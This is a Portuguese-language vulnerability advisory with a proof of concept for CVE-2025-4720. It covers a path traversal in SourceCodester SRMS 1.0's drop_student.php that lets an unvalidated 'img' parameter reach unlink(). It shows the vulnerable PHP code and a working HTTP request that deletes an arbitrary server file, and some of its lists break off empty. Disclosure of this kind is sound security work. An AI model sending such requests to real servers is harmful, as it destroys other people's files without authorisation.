
Prova de conceito de exploração para CVE-2025-4720: path traversal no SourceCodester SRMS 1.0 permitindo exclusão arbitrária de arquivos através de parâmetro GET não validado.
Existe uma vulnerabilidade de path traversal no endpoint drop_student.php do Student Result Management System (SRMS) 1.0 do SourceCodester.
A aplicação recebe entrada controlada pelo usuário do parâmetro GET img e a passa diretamente para a função unlink() sem validação, permitindo a exclusão de arquivos arbitrários no servidor.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
Um atacante pode excluir arquivos arbitrários acessíveis ao servidor web, incluindo:
Isso pode levar a negação de serviço ou exploração adicional.
Esta vulnerabilidade representa um vetor de ataque distinto em comparação com problemas relatados anteriormente no SRMS, pois:
SourceCodester
Sistema de Gerenciamento de Resultados de Alunos (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi